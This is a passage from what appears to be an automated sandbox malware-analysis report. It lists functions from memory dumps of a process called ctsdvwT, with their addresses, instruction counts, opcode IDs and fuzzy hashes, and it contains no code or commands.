                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 29365ea609eea1e50e71bf41739a1ece89c714e8f4cebdee2ca90ed57a1de9f0
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: 40112672444240CFDB16CF44D5C4B56BF71FB89324F24C6A9D9090B25BC73AE45ACBA2
                                            Function 0132D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 93138cc410b9417f55dd973bdd5a714c0088659d186a2f69778c1e3e09a0267f
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 0411BB75504380DFDB02DF54D5C4B15BFB1FB85228F24C6A9D8494B296C33AD40ACB62
                                            Function 0131D745 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b4a9f02998a7d5ad817879698cade631b15fae2f5b45efb1ab162059faca617
                                            • Instruction ID: bc8b7ee5dc5954c80df4e90f904e4afc5b00fd6d3671239021be3c7c748431ed
                                            • Opcode Fuzzy Hash: 0b4a9f02998a7d5ad817879698cade631b15fae2f5b45efb1ab162059faca617
                                            • Instruction Fuzzy Hash: 490120310043849AE7145E9DCD8CB67FF9CDF47328F18C52AED090A28AD2799400CA71
                                            Function 0131D744 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 397f8f87bc40ffc21d8d44380d4136f29261f64c240aacf3d450b39c8ebe84f1
                                            • Instruction ID: cd0bff70b97ebf6dcb45d4e5751ff61a81d2273f2ad74f1f00dd91df53c907b1
                                            • Opcode Fuzzy Hash: 397f8f87bc40ffc21d8d44380d4136f29261f64c240aacf3d450b39c8ebe84f1
                                            • Instruction Fuzzy Hash: B9F0F6710043849EE7148E1ACC88B63FFD8EF42334F18C45AED084B28AC2799840CBB0

                                            Executed Functions

                                            Function 0181C980 Relevance: 3.5, Strings: 1, Instructions: 2244COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,btq
                                            • API String ID: 0-3970051468
                                            • Opcode ID: 35ba21d186f7756809ffb53d22a539558fde650fefe9ddee27d88f02b6bfb181
                                            • Instruction ID: 462100a3ac87e3ec41d7a751900b30937605a2cbec67abb7eb14e9ac27943324
                                            • Opcode Fuzzy Hash: 35ba21d186f7756809ffb53d22a539558fde650fefe9ddee27d88f02b6bfb181
                                            • Instruction Fuzzy Hash: A7331C31D1061A8EDB11EF68C88069DF7B5FF99300F15C79AD449AB225EB70AAC5CF81
                                            Function 01819638 Relevance: 2.8, Instructions: 2812COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bcb4d48dc811474a72d70f96c86a4fc94f19324aac03a889e626e0768de87e1
                                            • Instruction ID: b98586f35770f9aa9251130d514ea08f8d2c0cb83fb5417786440e9c1f16658e
                                            • Opcode Fuzzy Hash: 6bcb4d48dc811474a72d70f96c86a4fc94f19324aac03a889e626e0768de87e1
                                            • Instruction Fuzzy Hash: A253F631C10B1A8ACB51EF68C8905A9F7B5FF99300F51C79AE458B7125FB70AAD4CB81
                                            Function 01814AA8 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be2c83a2656cf360762f976bf19cca517e2cb5295a134890a49dd562a5e25926
                                            • Instruction ID: 5abc38e022cee2dc95716fa9cd63f2135ff06128013fa4878621c74156c27c8f
                                            • Opcode Fuzzy Hash: be2c83a2656cf360762f976bf19cca517e2cb5295a134890a49dd562a5e25926
                                            • Instruction Fuzzy Hash: 36B15D72E00209CFDF10CFA9C98579DBBF6BF88314F148529D819E7298EB749985CB81
                                            Function 01813E90 Relevance: .2, Instructions: 238COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59f7b49ba49ac38e2b1f97e8bec612c290d04095453327b8ae8cab374d123efe
                                            • Instruction ID: ae3e27b29c363920121e59481b25099e7a30c865078a289837d576d5a01586ed
                                            • Opcode Fuzzy Hash: 59f7b49ba49ac38e2b1f97e8bec612c290d04095453327b8ae8cab374d123efe
                                            • Instruction Fuzzy Hash: B9917E71E00609DFDF10CFA9C98179DBBF6BF88314F148129E819E7258EB349985CB81
                                            Function 01814F99 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 3
                                            • API String ID: 0-1842515611
                                            • Opcode ID: d637afaae9cdb9498fa35bcdb4c82c009446a911100b3c2088d237cbc9de56aa
                                            • Instruction ID: 237f351d0e1cd66adadb5c147b20b2a00441be092d45e6828b9e3488a05416dc
                                            • Opcode Fuzzy Hash: d637afaae9cdb9498fa35bcdb4c82c009446a911100b3c2088d237cbc9de56aa
                                            • Instruction Fuzzy Hash: E841AE36A002098FCB10DF78D4586ADBBF5EF89324F208469D505EB355DB359E45CBA1
                                            Function 0181EEC5 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 1a6420d2ed106c398285c8cbf12f8144bef4a7f57d51bb8dc5ccb6a92cfb639f
                                            • Instruction ID: c34474447cca3c45e8fd0228d574cf7dfaf2d1dc6522c0e690f09edd87127e20
                                            • Opcode Fuzzy Hash: 1a6420d2ed106c398285c8cbf12f8144bef4a7f57d51bb8dc5ccb6a92cfb639f
                                            • Instruction Fuzzy Hash: 90311D317002099FCB1A9B78D55462E7BFBAF89310F208468E806DB399DF38CD46CB91
                                            Function 018171E8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 1408c07a98c58aec61b9265861afb1bb63dcae1d7afd0335c4d660a433b0f557
                                            • Instruction ID: 5d9d345495e482b9306868829a2137e66f55d1eca416de7833d164c66978c686
                                            • Opcode Fuzzy Hash: 1408c07a98c58aec61b9265861afb1bb63dcae1d7afd0335c4d660a433b0f557
                                            • Instruction Fuzzy Hash: E4318131E102099BDB15CFA9C4817EEB7B6EF45300F60852DF806E7354DB74AA42CB51
                                            Function 018171F8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 7f37eb7ea4c5391e5343b99c8a6f2534a2260c119f936fe4c88b097f9978dedf
                                            • Instruction ID: fb55b02f0dd2d936145e4de554a820151153d7ba753583c2898e51ada8ff4b3b
                                            • Opcode Fuzzy Hash: 7f37eb7ea4c5391e5343b99c8a6f2534a2260c119f936fe4c88b097f9978dedf
                                            • Instruction Fuzzy Hash: 0B317231E102099BDB15CFA9D4407EEB7B6FF85304F508529F906E7254DB749A82CB91
                                            Function 018126EC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \
                                            • API String ID: 0-2967466578
                                            • Opcode ID: 055a840a091262253991997486f76e74218a7d74457ccc430b70518e5050cc72
                                            • Instruction ID: 36544595407b0f26c20c154792dad14a7947b10e7c9d93a478e91abdcfdbf5b3
                                            • Opcode Fuzzy Hash: 055a840a091262253991997486f76e74218a7d74457ccc430b70518e5050cc72
                                            • Instruction Fuzzy Hash: 9B41F1B5D0034C9FDB14DFA9C584ADEBFF5AF08314F248429E819AB254DB74994ACB90
                                            Function 01816BA9 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 3d24b00241ce7b1a97c19aa0aa764de5013cf2246cf379120ad33ca046c31fac
                                            • Instruction ID: d967fe7e4e1df7619fcd7ea8ca01500f954ac72f5d45b48dad1ced0e28e13f4b
                                            • Opcode Fuzzy Hash: 3d24b00241ce7b1a97c19aa0aa764de5013cf2246cf379120ad33ca046c31fac
                                            • Instruction Fuzzy Hash: DA21BB33A082454FC7061F7CC4602AA7FB6EF92700B1584EBE049CB356EE759D0AC792
                                            Function 01818E5C Relevance: .4, Instructions: 374COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fb5cb063f92340e30c2688466a61b9ed2b132b7682c560bf24cc706513ef514
                                            • Instruction ID: 39e5a55c5eba5b69992bec2834c9c278faf2a0c6f759cc92608115bf1e615976
                                            • Opcode Fuzzy Hash: 7fb5cb063f92340e30c2688466a61b9ed2b132b7682c560bf24cc706513ef514
                                            • Instruction Fuzzy Hash: 43D19F35B001059FDB14DF68D594AADBBBAFF88314F248529E806DB359DB34ED82CB81
                                            Function 01817780 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ddae12690bae3b365dd3d4fd0e6f0654d64ff779cd2dc602128d70a3a460b44
                                            • Instruction ID: 8ab3fdbd04021cc236babdeeeebd140e721c4763017e816f336562745a913c9e
                                            • Opcode Fuzzy Hash: 0ddae12690bae3b365dd3d4fd0e6f0654d64ff779cd2dc602128d70a3a460b44
                                            • Instruction Fuzzy Hash: 78B18F313001069BCB19AB2CE58462D7BABFB95314F90593DE006CB369DF79ED8AC791
                                            Function 01814A9C Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba8444e5b572c72eb2655e74251a796781863450e5638d7872f2e0b6215cb80d
                                            • Instruction ID: 5f5f0b052301987eee2b18ac352de151b289c2512f91b44134744f4924a4ac75
                                            • Opcode Fuzzy Hash: ba8444e5b572c72eb2655e74251a796781863450e5638d7872f2e0b6215cb80d
                                            • Instruction Fuzzy Hash: 71A15C72E00209CFDF10CFA8C98579DBBF5BF88314F148529D819E7258EB749985CB81
                                            Function 01813E84 Relevance: .2, Instructions: 237COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c654319aebe6fd07fb9b8921dd762ddb990866d012df51b6fdd64a3ce64c6dbe
                                            • Instruction ID: 73fbf84b5f2159eba54ec9ce247b4bf5a8d26f2e5711861b790cd30b97ba3024
                                            • Opcode Fuzzy Hash: c654319aebe6fd07fb9b8921dd762ddb990866d012df51b6fdd64a3ce64c6dbe
                                            • Instruction Fuzzy Hash: C0916B71E00609DFDF10CFA9C981B9DBBF6BF88314F148129E819E7258EB749985CB91
                                            Function 01819398 Relevance: .2, Instructions: 213COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5e7af2ebc8aaf484b81e246b05277599f590ef8349bb409cb830d478fba0438
                                            • Instruction ID: cddf4b7f7b15f1169ae28488aa464c3f6c18ab0bab73465eb99ffc8e0e84217c
                                            • Opcode Fuzzy Hash: d5e7af2ebc8aaf484b81e246b05277599f590ef8349bb409cb830d478fba0438
                                            • Instruction Fuzzy Hash: 51718D71E002058FDB04CF69D994B99BBB6FF88314F14C169E909EB399DB70D944CB90
                                            Function 0181C630 Relevance: .2, Instructions: 194COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e2e52752be8a4dde66a33e481a075983a36bc8fc13cecb93ee823f20778522d
                                            • Instruction ID: ad3ef4874fd7e48a013fceb533ad275fedf86fed1281dec8825176a6e77cf786
                                            • Opcode Fuzzy Hash: 6e2e52752be8a4dde66a33e481a075983a36bc8fc13cecb93ee823f20778522d
                                            • Instruction Fuzzy Hash: 1D61C233E1052A8BDB15CB5DC8807BEF7F6EB84310F198969C856EB646C334AE41CB91
                                            Function 018191D8 Relevance: .1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7586c33d4a222c1b404f729181342c7f40c098269478b2f5da9e8e78125ce56
                                            • Instruction ID: 63d13d42efaba7ac3e52faf4cd1b850183dad82ae395327a8b787a046fff11ef
                                            • Opcode Fuzzy Hash: f7586c33d4a222c1b404f729181342c7f40c098269478b2f5da9e8e78125ce56
                                            • Instruction Fuzzy Hash: AA41BC32F001068BDF258AADD4A07AFB7BAFB45718F204826D519D7385D634DD46C792
                                            Function 01816CE7 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0ea97b1f819c34164d90b9a525849b25a37f86edb91375e86987ad2e8ae891c
                                            • Instruction ID: b1d71c85b2a45b9a869bd06d008c87f7dafff5f65ab137252a57d091282fc91f
                                            • Opcode Fuzzy Hash: b0ea97b1f819c34164d90b9a525849b25a37f86edb91375e86987ad2e8ae891c
                                            • Instruction Fuzzy Hash: E95124B1D002188FDB14CFA9C885B9DBBB5FF48314F248129E819BB395E7B4A944CF95
                                            Function 01816CF0 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13ee409add65db3d45dacf0e5eac7bd62e475bbd177bc647781156a9597e7ee8
                                            • Instruction ID: 9eb13382c9d5a272b7f45940874c5cc98105dfd222b749f0829ee64e615369e8
                                            • Opcode Fuzzy Hash: 13ee409add65db3d45dacf0e5eac7bd62e475bbd177bc647781156a9597e7ee8
                                            • Instruction Fuzzy Hash: 105123B1D002188FDB14CFA9C884B9DBBB5BF48314F248129E819BB395D7B4A944CF95
                                            Function 0181112B Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dce302749ce642feaf3dc73025790130191c72fb09cfb3671b87316d3f44e075
                                            • Instruction ID: af02cc067d984f638cafc48e776a21ea8401e12cfb6ef569de09fc02ac2c57ad
                                            • Opcode Fuzzy Hash: dce302749ce642feaf3dc73025790130191c72fb09cfb3671b87316d3f44e075
                                            • Instruction Fuzzy Hash: 47512D31602145AFDB19DF2AFA90D543F79EB5E70430059A8D0145B23ADF386E8DDF92
                                            Function 01811138 Relevance: .1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f2921f1ef5feb84ed6a79d4d6851c831be637f345c8bfb23436ff10391c1601
                                            • Instruction ID: 6bf69c38d37bda352fe24d1ae957ef2e68696dae9ab66de5347bd9e0cb94e789
                                            • Opcode Fuzzy Hash: 7f2921f1ef5feb84ed6a79d4d6851c831be637f345c8bfb23436ff10391c1601
                                            • Instruction Fuzzy Hash: 5051FA34602145AFCB19DF2AFA90D543F69FB5EB043009AA8D0155B239DF386E8DDF92
                                            Function 0181ED88 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b97885e7c32197d8504cdcc6196b3a3ec2669bae3be35aa96cc9d050c8a38b1
                                            • Instruction ID: 07b18f67691fecc2ee1d656d7bb4cdc64593e3032fe8afdbaf1bd4c1473b2c49
                                            • Opcode Fuzzy Hash: 1b97885e7c32197d8504cdcc6196b3a3ec2669bae3be35aa96cc9d050c8a38b1
                                            • Instruction Fuzzy Hash: 7F318D35E10205DBDB1ACFA9D49469EBBB6EF89300F10C929EC16E7354DB70AD46CB50
                                            Function 0181ED98 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a83c48fb1ea4417d324061a6e4cea4c10b01ce8c31eead69453695f6581dd08
                                            • Instruction ID: f22d0cbec312327714933091a46e71b54c549e38a402f68a9db73904c7fb050e
                                            • Opcode Fuzzy Hash: 1a83c48fb1ea4417d324061a6e4cea4c10b01ce8c31eead69453695f6581dd08
                                            • Instruction Fuzzy Hash: DE318135E10205DBDB1ACFA9D49469EBBB6FF89300F108919EC16E7354DB70AD46CB50
                                            Function 018126F8 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f16092e20323c1babb275198ea82f84e323e47739960d355e5fc17f8677c814
                                            • Instruction ID: cefef6f1500a4967db8e114cae41a002717504b79962bdce6d015199a9e37647
                                            • Opcode Fuzzy Hash: 6f16092e20323c1babb275198ea82f84e323e47739960d355e5fc17f8677c814
                                            • Instruction Fuzzy Hash: B3410FB1D003489FDB14DF99C484ADEBFF5FF48310F208429E809AB254DB35A945CB90
                                            Function 01818D49 Relevance: .1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30a2624a250c5c1c9bda4a200b8d509029d3d8e0a8028608eab7fe9c8fb61b8f
                                            • Instruction ID: c9f56209c2c04d61f2fc00650ca71ceeada01c188186eb5834d00d21a19638c6
                                            • Opcode Fuzzy Hash: 30a2624a250c5c1c9bda4a200b8d509029d3d8e0a8028608eab7fe9c8fb61b8f
                                            • Instruction Fuzzy Hash: F931C371E002099BDB05CF69D88169EFBB6FF86300F508619E805EB345DB70AD46CB90
                                            Function 01818D58 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d05b49226b940e3a7cfcefde03cd575fd6836ef2120bba0c60b85ba54c3545e
                                            • Instruction ID: 08e1d0d893029b9a35d56bdd0bc4806c6486f5c829b8f8f0c605cf4a0673ab95
                                            • Opcode Fuzzy Hash: 5d05b49226b940e3a7cfcefde03cd575fd6836ef2120bba0c60b85ba54c3545e
                                            • Instruction Fuzzy Hash: F2219431E1020A9BDB15CF69D89569EFBB6FF8A300F50C619E805EB345DB70AD46CB90
                                            Function 01811380 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91c628150b0a864dfad8ba3b038dace49f4cde4a22b89c09fc9cf10eac8179a9
                                            • Instruction ID: 495896db7f6fa8b78db768f6a523eb40eb485217f7793fdf5465ef4ddd4f1846
                                            • Opcode Fuzzy Hash: 91c628150b0a864dfad8ba3b038dace49f4cde4a22b89c09fc9cf10eac8179a9
                                            • Instruction Fuzzy Hash: 6821A1716401088BEB725A7DE48D7793E6AE746711F10082EF60AC7389EE2DDD85CB82
                                            Function 018116B0 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ca168f1beb37f7df00565d7e71717685803dbe0cef6c6e71fd4f473c5166558
                                            • Instruction ID: 698a68238c1d6f0c6d3706372de320a5e1afcf1cf7022e85e45566e8448c4dcd
                                            • Opcode Fuzzy Hash: 5ca168f1beb37f7df00565d7e71717685803dbe0cef6c6e71fd4f473c5166558
                                            • Instruction Fuzzy Hash: 9A2183356001054FEB66DB3DF888B6A3B6EEB49304F104D25D51AC735EDF28DD858B92
                                            Function 01818C48 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71a7a9d71211177bdee8e9ce6bd1d61ddb18ecb6aeb3052c999038ce85892fc8
                                            • Instruction ID: 256dee642eeb80d990e28d7e4bcecf1d280ea4f78b1c38089b7decf5cec6ea17
                                            • Opcode Fuzzy Hash: 71a7a9d71211177bdee8e9ce6bd1d61ddb18ecb6aeb3052c999038ce85892fc8
                                            • Instruction Fuzzy Hash: DA21A431E006099BDB19CFA8C4915DEF7B6EF89304F20852AEC15F7354DB709946CB51
                                            Function 015CD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4506811045.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
